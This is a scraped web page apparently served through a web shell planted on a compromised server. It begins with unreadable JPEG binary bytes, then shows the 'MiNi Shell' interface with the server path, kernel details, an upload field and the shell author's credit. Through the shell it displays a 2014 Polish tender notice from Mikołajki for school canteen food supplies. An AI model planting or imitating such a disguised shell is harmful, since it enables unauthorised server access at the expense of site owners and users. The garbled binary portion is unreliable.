JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141211/406498-N-2014.html

<p class="kh_header"><b>Mikołajki: Dostawa artykułów spożywczych do stołówki szkolnej w Mikołajkach i Baranowie</b><br>
<b>Numer ogłoszenia: 406498 - 2014; data zamieszczenia: 11.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mikołajki , ul. Kolejowa 7, 11-730 Mikołajki, woj. warmińsko-mazurskie, tel. 087 4219050, faks 087 4219099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolajki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki szkolnej w Mikołajkach i Baranowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych do stołówki szkolnej w Mikołajkach i Baranowie w okresie od 02.01.2015 do 31.12.2015. Amarantus 250g	szt.	50,
Baton czekoladowy Snikers/Mars lub równoważny	szt.	1200,
Bazylia w paście	szt.	20,
Brokuły mrożone op. min. 2,5kg	kg	200,
Chrzan tarty	kg	10,
Ciastka na wagę	kg	20,
Crunche naturalne 350g (minimalna zawartość pełnego ziarna owsa 54%)	szt.	100,
Crunche owocowe 350g (minimalna zawartość pełnego ziarna owsa 43%)	szt.	100,
Cukier biały	kg	110,
Cukier brązowy	kg	800,
Cukier puder 0,4 kg	szt.	10,
Cukierki owocowe/czekoladowe na wagę	kg	70,
Curry	kg	3,
Cynamon	kg	1,7,
Czekolada 100g (minimalna zawartość miazgi kakaowej 30%)	szt.	1150,
Czosnek granulowany	kg	5,
Delikat do drobiu Knorr 0,6 kg lub równoważną (za równoważną uważamy przyprawę zawierającą w swoim składzie paprykę, kolendrę, kurkumę, kmin, kozieradkę, kardamon)	szt.	10,
Dziki ryż 200g	szt.	400,
Dżem Łowicz 100% 220g lub równoważny (za równoważny uważamy dżem z 100% zawartością owoców, na 100g dżemu użyto 100g owoców)	szt.	650,
Fasola czerwona konserwowa	kg	25,
Fasola szparagowa, zielona, nie krojona, mrożona op. min 2,5kg	kg	350,
Fix do spaghetti Knorr lub równoważny 1200g	szt.	6,
Fix słodko-kwaśny Knorr lub równoważny 1500g	szt.	5,
Galaretka owocowa	szt.	20,
Gałka muszkatałowa mielona	kg	1,
Granola orzechowa 350g (minimalna zawartość orzechów arachidowych 9,4%)	szt.	100,
Granola owocowa 350g (minimalna zawartość owoców liofilizowanych np. aronia, żurawina 1,7%)	szt.	100,
Groszek mrożony ziarno op. Min. 2,5kg	kg	120,
Groszek zielony konserwowy	kg	50,
Herbata czarna liściasta 100g	szt.	450,
Imbir mielony	kg	1,
Jagody goji suszone 150g	szt.	20,
Kakao 100g	szt.	150,
Kalafior mrożony op. min. 2,5kg	kg	250,
Kalafior mrożony op. 400g	 	120,
Kasza gryczana prażona op. min. 5kg	kg	300,
Kasza jęczmienna średnia op. min 5kg	kg	300,
Kasza jęczmienna średnia op. 0,5kg	 	130,
Kasza kukurydziana 350g	szt.	25,
Kasza manna	kg	50,
Kasza pęczak op. min 5kg	kg	300,
Kawa zbożowa rozpuszczalna 150g	szt.	75,
Ketchup łagodny Pudliszki 480g lub równoważny (za ketchup równoważny uważamy ketchup do przygotowania którego zużyto minimum 193g pomidorów na 100g produktu)	szt.	380,
Kluski śląskie mrożone	kg	290,
Kmin rzymski mielony	kg	2,
Kminek	kg	1,
Kolendra mielona	kg	2,
Kompot w słoiku 0,9l	szt.	5180,
Koncentrat buraczany w płynie	l	30,
Koncentrat pomidorowy op. min. 0,7kg	szt.	660,
Kopytka mrożone	kg	200,
Krem nutella 350g lub równoważny ( za krem równoważny uważamy krem z minimum 13% zawartością orzechów laskowych)	szt.	350,
Kukurydza konserwowa	kg	306,
Kurkuma	kg	2,
Kwasek cytrynowy 20g	szt.	320,
Laska wanilii	szt.	150,
Liść laurowy	kg	1,85,
Lizak owocowy	szt.	500,
Łosoś filet	kg	200,
Łosoś wędzony na zimno	kg	25,
Magi 1l	l	20,
Majeranek	kg	4,3,
Majonez słoik 0,9l	szt.	300,
Mąka ziemniaczana	kg	105,
Makaron pełnoziarnisty lubella lub równoważny op. min. 0,5kg (za makaron równoważny uważamy makaron wyprodukowany z maki makaronowej pszennej pełnoziarnistej)	kg	100,
Makaron z pszenicy durum opakowanie minimum 5kg	kg	1026,
Makrela w pomidorach	szt.	50,
Makrela wędzona	kg	40,
Malina mrożona op. min. 2,5kg	kg	100,
Margaryna do ciasta 200g	szt.	60,
Margaryna Planta 200g	szt.	50,
Mąka graham	kg	150,
Mąka pszenna	kg	610,
Mąka żytnia razowa	kg	150,
Mieszanka warzywna mrożona 4-składnikowa (marchew, brokuł, kalafior, fasolka mamut) op. min. 2,5kg	kg	270,
Migdały blanszowane 100g	szt.	150,
Miód lipowy w słoiku 0,9l	szt.	100,
Miód wielokwiatowy w słoiku 0,9l	szt.	100,
Morela suszona 100g	szt.	150,
Musztarda francuska 185g	szt.	100,
Musztarda sarepska	kg	17,
Ocet balsamiczny 	l	5,
Ocet jabłkowy	l	5,
Ocet winny biały	l	5,
Ogórki konserwowe 0,9l	szt.	250,
Olej rzepakowy	l	750,
Olej słonecznikowy	l	100,
Olej z pestek winogron	l	50,
Oliwa z oliwek extra  virgin	l	50,
Oliwki czarne całe w słoiku 0,9l	szt.	15,
Oliwki zielone całe w słoiku 0,9l	szt.	15,
Oregano	kg	2,
Orzechy laskowe łuskane 100g	szt.	150,
Orzechy nerkowca 100g	szt.	150,
Orzechy włoskie łuskane 100g	szt.	150,
Otręby pszenne 150g	kg	3,
Otręby żytnie 150g	kg	3,
Papryka mielona	kg	11,4,
Pasta pesto	szt.	10,
Pestki dyni łuskane 100g	szt.	150,
Pieprz biały mielony	kg	5,
Pieprz czarny mielony	kg	11,
Płatki jęczmienne błyskawiczne 1kg	kg	10,
Płatki kukurydziane	kg	75,
Płatki migdała 100g	szt.	75,
Płatki owsiane błyskawiczne 1kg	kg	30,
Płatki ryżowe błyskawiczne 1kg	kg	15,
Płatki czekoladowe	kg	50,
Pomidory krojone w puszce 2,5kg	kg	200,
Powidła śliwkowe Łowicz 290g lub równoważne ( za równoważne powidła uważamy powidła wyprodukowane minimum ze 182g owoców na 100g produktu)	szt.	150,
Proszek do pieczenia	szt.	30,
Przyprawa do ryb Knorr 0,6kg lub równoważna ( za przyprawę równoważną uważamy przyprawę zawierającą w swoim składzie pieprz biały, natkę pietruszki, koperek oraz imbir)	szt.	35,
Przyprawa do mięs Knorr 0,6kg lub równoważna ( za przyprawę równoważną uważamy przyprawę zawierającą w swoim składzie paprykę, rozmaryn, oregano, pieprz czarny, tymianek oraz gałkę muszkatołową)	szt.	20,
Przyprawa gyros	kg	5,
Przyprawa typu wegeta op. Min. 1kg	kg	175,
Pyzy ziemniaczane mrożone 450g	szt.	180,
Quinoa - Komosa ryżowa 250g	szt.	50,
Rodzynki 100g	szt.	150,
Rosołek drobiowy Winiary 180g lub równoważny	szt.	160,
Rozmaryn	kg	2,
Rozmaryn pasta	szt.	10,
Ryż brązowy	kg	100,
Ryż paraboiled op. min. 5kg	kg	600,
Ryż paraboiled op. 1kg	kg	50,
Sandacz filet	kg	200,
Sezam 300g	szt.	75,
Siemię lniane 400g	szt.	50,
Słonecznik łuskany 150g	szt.	150,
Sok marchwiowo-owocowy hortex lub równoważny 1l (za produkt równoważy uważamy sok o minimum 40% zawartości przecierów warzywno-owocowych)	l	1200,
Sok owocowy 100%  1l	l	800,
Sok w kartoniku 200ml	szt.	200,
Sos sałatkowy koperkowy op. minimum 700g	szt.	20,
Sos sałatkowy ogrodowy op. minimum 700g	szt.	10,
Sól morska 	kg	240,
Syrop aroniowy łowicz 250ml lub równoważny (za syrop równoważny uważamy syrop o 57% zawartości zagęszczonego soku z aronii) 	szt.	10,
Syrop jagodowy 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 18% zawartości zagęszczonego soku ,Syrop klonowy 100% 500ml	szt.	20,
Syrop malinowy 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 38% zawartości zagęszczonego soku z malin) 	szt.	20,
Syrop z czarnego bzu 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 19% zawartości zagęszczonego soku z czarnego bzu) 	szt.	10,
Syrop z dzikiej róży 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 57% zawartości zagęszczonego soku z dzikiej róży) 	szt.	10,
Syrop z pędów sosny 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 1,36% zawartości ekstraktu z pędów sosny) 	szt.	10,
Syrop owocowy 5L	szt.	10,
Szpinak mrożony siekany op. Min. 2,5kg	kg	50,
Śledź w pomidorach puszka	szt.	50,
Śliwka suszona 100g	szt.	150,
Tilapia filet	kg	600,
Truskawka mrożona op. Min. 2,5kg	kg	350,
Tuńczyk w zalewie puszka	szt.	50,
Tymianek w paście	szt.	10,
Wafelek w czekoladzie	szt.	500,
Wiśnia mrożona op. Min. 2,5kg	kg	100,
Woda mineralna op. 1,5l	l	2500,
Zacierka op. Min. 250g	szt.	200,
Ziele angielskie	kg	4,
Zioła prowansalskie	kg	1,1,
Zioła prowansalskie w paście	szt.	10,
Zupy w proszku 1 kg Winiary lub równoważne	szt.	10,
Żurawina cała w słoiku 300g (minimalna zawartość żurawiny 49%)	szt.	150.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolajki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Mikołajki ul. Kolejowa 7, 11-730 Mikołajki pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2014 godzina 09:00, miejsce: Urząd Miasta i Gminy Mikołajki ul. Kolejowa 7, 11-730 Mikołajki pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com